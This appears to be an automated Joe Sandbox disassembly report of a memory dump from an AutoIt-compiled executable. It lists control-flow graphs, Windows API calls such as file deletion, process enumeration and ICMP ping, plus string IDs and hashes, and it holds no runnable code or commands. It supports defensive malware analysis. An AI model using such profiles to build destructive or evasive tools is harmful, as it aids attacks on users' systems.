1215->1219 1216->1195 1217->1195 1218->1195 1223 2a105a-2a1060 1220->1223 1224 2a1052-2a1055 1220->1224 1221->1195 1226 2a106e-2a1083 1221->1226 1223->1195 1224->1195 1229 2a108d-2a1093 1226->1229 1230 2a1085-2a1088 1226->1230 1235 265e85-265e8a 1227->1235 1236 265e50-265e54 GetNativeSystemInfo 1227->1236 1231 265e56-265e5a 1228->1231 1229->1195 1230->1195 1231->1219 1233 265e5c-265e5f FreeLibrary 1231->1233 1233->1219 1235->1236 1236->1231
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00265D40
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • GetCurrentProcess.KERNEL32(?,002E0A18,00000000,00000000,?), ref: 00265E07
                                                          • IsWow64Process.KERNEL32(00000000), ref: 00265E0E
                                                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 00265E54
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00265E5F
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00265E90
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00265E9C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                          • String ID:
                                                          • API String ID: 1986165174-0
                                                          • Opcode ID: e0ae1c92eda37a38f47af78333135608a89a5ab25e5700834a483a7e85e8cf8f
                                                          • Instruction ID: c9a55d90e95c5eee1acb2da035de5a0a32ebd0fdd2926a9386bad2744b07b4a1
                                                          • Opcode Fuzzy Hash: e0ae1c92eda37a38f47af78333135608a89a5ab25e5700834a483a7e85e8cf8f
                                                          • Instruction Fuzzy Hash: 3191F731569BD1DECB31CF7484900ABFFE56F2A300F880A9ED4CB97A41D631A5A8C759

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1278 2b4005-2b404c call 261207 * 3 call 270284 call 2b4fec 1289 2b404e-2b4057 call 261900 1278->1289 1290 2b405c-2b408d call 270119 FindFirstFileW 1278->1290 1289->1290 1294 2b408f-2b4091 1290->1294 1295 2b40fc-2b4103 FindClose 1290->1295 1294->1295 1297 2b4093-2b4098 1294->1297 1296 2b4107-2b4129 call 261cb6 * 3 1295->1296 1299 2b409a-2b40d5 call 261c9c call 2617e0 call 261900 DeleteFileW 1297->1299 1300 2b40d7-2b40e9 FindNextFileW 1297->1300 1299->1300 1313 2b40f3-2b40fa FindClose 1299->1313 1300->1294 1301 2b40eb-2b40f1 1300->1301 1301->1294 1313->1296
                                                          APIs
                                                            • Part of subcall function 00270284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00262A58,?,00008000), ref: 002702A4
                                                            • Part of subcall function 002B4FEC: GetFileAttributesW.KERNEL32(?,002B3BFE), ref: 002B4FED
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 002B407C
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 002B40CC
                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 002B40DD
                                                          • FindClose.KERNEL32(00000000), ref: 002B40F4
                                                          • FindClose.KERNEL32(00000000), ref: 002B40FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: f8552067a146ce2e31867e3dfa6bab1856dcc4da99cbf30d1ad98977f7d65d2a
                                                          • Instruction ID: ec681c5611032202abafa967c07c8bc17d1ccc3bc8e866a10aef05a4ca05a1f1
                                                          • Opcode Fuzzy Hash: f8552067a146ce2e31867e3dfa6bab1856dcc4da99cbf30d1ad98977f7d65d2a
                                                          • Instruction Fuzzy Hash: 8431A0310683859BC305FF60D8D58EFB7E8BE91301F440E1DF9E582192DB60AA69CB63
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 002B416D
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 002B417B
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 002B419B
                                                          • CloseHandle.KERNEL32(00000000), ref: 002B4245
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 5dede37be4e8ca4402cff2bbc848ae06d39970236c2fe80a2e397cb32e36d590
                                                          • Instruction ID: 95b536a9e836a8a01c7f41dabc6465bbef7238fe091cb30b8bccf629a2ce598d
                                                          • Opcode Fuzzy Hash: 5dede37be4e8ca4402cff2bbc848ae06d39970236c2fe80a2e397cb32e36d590
                                                          • Instruction Fuzzy Hash: 923195711183419FD300EF50D8C5AAFBBF8BF95350F44052DF985C61A2EBB1A9A9CB52
                                                          APIs
                                                            • Part of subcall function 00263740: CharUpperBuffW.USER32(?,003171DC,00000000,?,00000000,003171DC,?,002553A5,?,?,?,?), ref: 0026375D
                                                          • _memmove.LIBCMT ref: 0025B68A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper_memmove
                                                          • String ID:
                                                          • API String ID: 2819905725-0
                                                          • Opcode ID: 646a900a64ed8fb3f636c31342a06896bc04fa8f6bcff84a8a24fa04bc822208
                                                          • Instruction ID: f05b5d76ca545c46b86b33c0296adc1e8f088bf2abfcde290085dacfd33cfb78
                                                          • Opcode Fuzzy Hash: 646a900a64ed8fb3f636c31342a06896bc04fa8f6bcff84a8a24fa04bc822208
                                                          • Instruction Fuzzy Hash: A5A28A756287419FDB22CF14C480B2AB7E1BF88304F14895DE89A8B361D770ED69CF96
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,0029FC86), ref: 002B495A
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 002B496B
                                                          • FindClose.KERNEL32(00000000), ref: 002B497B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: a8eed1a80faf7d41ed1397ba0527a15b2e46a503d796a2ebc6a6404b7b8ea619
                                                          • Instruction ID: 9e6f531b2a35803e121ef69fe65001009113869e297b2582e2fc11e72c290884
                                                          • Opcode Fuzzy Hash: a8eed1a80faf7d41ed1397ba0527a15b2e46a503d796a2ebc6a6404b7b8ea619
                                                          • Instruction Fuzzy Hash: A1E0D8314609059742107B38FCCD8EA775C9E063B5F100705F935C50D0F7B0A9944695
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59d2357df38679b57d940cbdf477d2a723887a73b3f7c45900a4ae63cf31b11b
                                                          • Instruction ID: f9072ac7b78ff0a1e63203b10bec9492d28b17b771ff3080c826a4dab4360dd4
                                                          • Opcode Fuzzy Hash: 59d2357df38679b57d940cbdf477d2a723887a73b3f7c45900a4ae63cf31b11b
                                                          • Instruction Fuzzy Hash: AC22BD70D20216DFDB24DF54C484AAEB7B4FF09301F14816AEC4AAB341E774A9A9CF95
                                                          APIs
                                                          • timeGetTime.WINMM ref: 0025BF57
                                                            • Part of subcall function 002552B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002552E6
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 002936B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessagePeekSleepTimetime
                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                          • API String ID: 1792118007-922114024
                                                          • Opcode ID: 7bf54f7a43ecfe23e1f8cab6b4e876f0eb175d5a51a2fae4cb63f10c8c81a555
                                                          • Instruction ID: 5e408ffce4f5b122ee4f363e484f72ef901398810c28c85a7495aab65ecd32ed
                                                          • Opcode Fuzzy Hash: 7bf54f7a43ecfe23e1f8cab6b4e876f0eb175d5a51a2fae4cb63f10c8c81a555
                                                          • Instruction Fuzzy Hash: 12C2D470628341DFDB25DF24C894BAAB7E5BF84304F14891DF88A87251DB70E9A9CF46

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00253444
                                                          • RegisterClassExW.USER32(00000030), ref: 0025346E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0025347F
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 0025349C
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002534AC
                                                          • LoadIconW.USER32(000000A9), ref: 002534C2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002534D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 2d69ed106a18b12b26e41b047c1a321912b67a47a4527a1f4a30a184662fd5f9
                                                          • Instruction ID: 393f76b7a8157f9a5e5495cfe29a6a68287ce4619b81c9821e06d0f7dc2bb08c
                                                          • Opcode Fuzzy Hash: 2d69ed106a18b12b26e41b047c1a321912b67a47a4527a1f4a30a184662fd5f9
                                                          • Instruction Fuzzy Hash: 833118B1884349EFDB518FA4E889BC9BBF4FF09310F14455AE590AA2A0D7B50592CF91

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00253444
                                                          • RegisterClassExW.USER32(00000030), ref: 0025346E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0025347F
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 0025349C
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002534AC
                                                          • LoadIconW.USER32(000000A9), ref: 002534C2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002534D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 8ca02b316d8c4843ae7c821da64717de0cab97cf0b689d657356d0d715d850df
                                                          • Instruction ID: c6206226794c3d28c4767bcfc6644970717f8328a7b9709a7ba99fb239eb2a48
                                                          • Opcode Fuzzy Hash: 8ca02b316d8c4843ae7c821da64717de0cab97cf0b689d657356d0d715d850df
                                                          • Instruction Fuzzy Hash: FF21E4B1994348AFDB019FA4EC89BDDBBF8FB08700F04811AF514AA2A0D7B11585CF95

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 002700CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00263094), ref: 002700ED
                                                            • Part of subcall function 002708C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0026309F), ref: 002708E3
                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002630E2
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002A01BA
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002A01FB
                                                          • RegCloseKey.ADVAPI32(?), ref: 002A0239
                                                          • _wcscat.LIBCMT ref: 002A0292
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 2673923337-2727554177
                                                          • Opcode ID: 0472a36846490039e0eeb8c581a6346539d70bc11c7e4025e98064465e063384
                                                          • Instruction ID: a88fb4ab8c5aeabad3fe8a8a30318c9eb1197f3509f73a49676418f84afb9b96
                                                          • Opcode Fuzzy Hash: 0472a36846490039e0eeb8c581a6346539d70bc11c7e4025e98064465e063384
                                                          • Instruction Fuzzy Hash: 6C718D714253419EC306EF25E8819ABBBECFF49340F40492EF445831A1EF7099AACB56

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00265156
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00265165
                                                          • LoadIconW.USER32(00000063), ref: 0026517C
                                                          • LoadIconW.USER32(000000A4), ref: 0026518E
                                                          • LoadIconW.USER32(000000A2), ref: 002651A0
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002651C6
                                                          • RegisterClassExW.USER32(?), ref: 0026521C
                                                            • Part of subcall function 00253411: GetSysColorBrush.USER32(0000000F), ref: 00253444
                                                            • Part of subcall function 00253411: RegisterClassExW.USER32(00000030), ref: 0025346E
                                                            • Part of subcall function 00253411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0025347F
                                                            • Part of subcall function 00253411: InitCommonControlsEx.COMCTL32(?), ref: 0025349C
                                                            • Part of subcall function 00253411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002534AC
                                                            • Part of subcall function 00253411: LoadIconW.USER32(000000A9), ref: 002534C2
                                                            • Part of subcall function 00253411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002534D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: 386dbf333d0b89b1d0e3769bafe75cdd0377ebb1f4b4fe7138fd6de5f07a9879
                                                          • Instruction ID: 5edb64f89056ba33bb625f7f311ad4ff988c3be891b317d4bb3b8144446ec28b
                                                          • Opcode Fuzzy Hash: 386dbf333d0b89b1d0e3769bafe75cdd0377ebb1f4b4fe7138fd6de5f07a9879
                                                          • Instruction Fuzzy Hash: 22216B70D94308AFEB129FA4ED89BDD7BB8FB1C710F048519F504AA2A0C7F655928F84

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 925 2c5e1d-2c5e54 call 254dc0 928 2c5e74-2c5e86 WSAStartup 925->928 929 2c5e56-2c5e63 call 25502b 925->929 931 2c5e9d-2c5edb call 2640cd call 254d37 call 26402a inet_addr gethostbyname 928->931 932 2c5e88-2c5e98 call 2a7135 928->932 929->928 937 2c5e65-2c5e70 call 25502b 929->937 946 2c5eec-2c5efc call 2a7135 931->946 947 2c5edd-2c5eea IcmpCreateFile 931->947 941 2c5ff6-2c5ffe 932->941 937->928 952 2c5fed-2c5ff1 call 261cb6 946->952 947->946 948 2c5f01-2c5f32 call 270fe6 call 26433f 947->948 957 2c5f34-2c5f53 IcmpSendEcho 948->957 958 2c5f55-2c5f69 IcmpSendEcho 948->958 952->941 959 2c5f6d-2c5f6f 957->959 958->959 960 2c5f71-2c5f76 959->960 961 2c5fa2-2c5fa4 959->961 962 2c5f78-2c5f7d 960->962 963 2c5fba-2c5fcc call 254dc0 960->963 964 2c5fa6-2c5fb2 call 2a7135 961->964 965 2c5f7f-2c5f84 962->965 966 2c5fb4-2c5fb8 962->966 972 2c5fce-2c5fd0 963->972 973 2c5fd2 963->973 976 2c5fd4-2c5fe8 IcmpCloseHandle WSACleanup call 2645ae 964->976 965->961 970 2c5f86-2c5f8b 965->970 966->964 974 2c5f8d-2c5f92 970->974 975 2c5f9a-2c5fa0 970->975 972->976 973->976 974->966 978 2c5f94-2c5f98 974->978 975->964 976->952 978->964
                                                          APIs
                                                          • WSAStartup.WS2_32(00000101,?), ref: 002C5E7E
                                                          • inet_addr.WSOCK32(?,?,?), ref: 002C5EC3
                                                          • gethostbyname.WS2_32(?), ref: 002C5ECF
                                                          • IcmpCreateFile.IPHLPAPI ref: 002C5EDD
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5F4D
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5F63
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 002C5FD8
                                                          • WSACleanup.WSOCK32 ref: 002C5FDE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: b70d797fe287047d41eebfdc64b43dcb3259f16c3504468896dc89f018e0b7f8
                                                          • Instruction ID: 31799b3835b392002561246c4b2042f0895c9377158376b1bad3635e07d862ce
                                                          • Opcode Fuzzy Hash: b70d797fe287047d41eebfdc64b43dcb3259f16c3504468896dc89f018e0b7f8
                                                          • Instruction Fuzzy Hash: AB51AD316646119FD720EF24DC89F2AB7E4EF49710F14462DF9999B2A0DB70E9A0CF42

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 979 264d83-264dd1 981 264dd3-264dd6 979->981 982 264e31-264e33 979->982 984 264e37 981->984 985 264dd8-264ddf 981->985 982->981 983 264e35 982->983 986 264e1a-264e22 DefWindowProcW 983->986 987 2a09c2-2a09f0 call 25c460 call 25c483 984->987 988 264e3d-264e40 984->988 989 264de5-264dea 985->989 990 264ead-264eb5 PostQuitMessage 985->990 991 264e28-264e2e 986->991 1024 2a09f5-2a09fc 987->1024 993 264e65-264e8c SetTimer RegisterWindowMessageW 988->993 994 264e42-264e43 988->994 995 264df0-264df2 989->995 996 2a0a35-2a0a49 call 2b2cce 989->996 992 264e61-264e63 990->992 992->991 993->992 1000 264e8e-264e99 CreatePopupMenu I_RpcFreeBuffer 993->1000 998 2a0965-2a0968 994->998 999 264e49-264e5c KillTimer call 265ac3 call 2534e4 994->999 1001 264eb7-264ec1 call 265b29 995->1001 1002 264df8-264dfd 995->1002 996->992 1014 2a0a4f 996->1014 1007 2a096a-2a096c 998->1007 1008 2a099e-2a09bd MoveWindow 998->1008 999->992 1010 264e9b-264eab call 265bd7 1000->1010 1016 264ec6 1001->1016 1011 2a0a1a-2a0a21 1002->1011 1012 264e03-264e08 1002->1012 1017 2a096e-2a0971 1007->1017 1018 2a098d-2a0999 SetFocus 1007->1018 1008->992 1010->992 1011->986 1020 2a0a27-2a0a30 call 2a8854 1011->1020 1012->1010 1022 264e0e-264e14 1012->1022 1014->986 1016->992 1017->1022 1025 2a0977-2a0988 call 25c460 1017->1025 1018->992 1020->986 1022->986 1022->1024 1024->986 1028 2a0a02-2a0a15 call 265ac3 call 2659d3 1024->1028 1025->992 1028->986
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00264E22
                                                          • KillTimer.USER32(?,00000001), ref: 00264E4C
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00264E6F
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00264E7A
                                                          • CreatePopupMenu.USER32 ref: 00264E8E
                                                          • PostQuitMessage.USER32(00000000), ref: 00264EAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
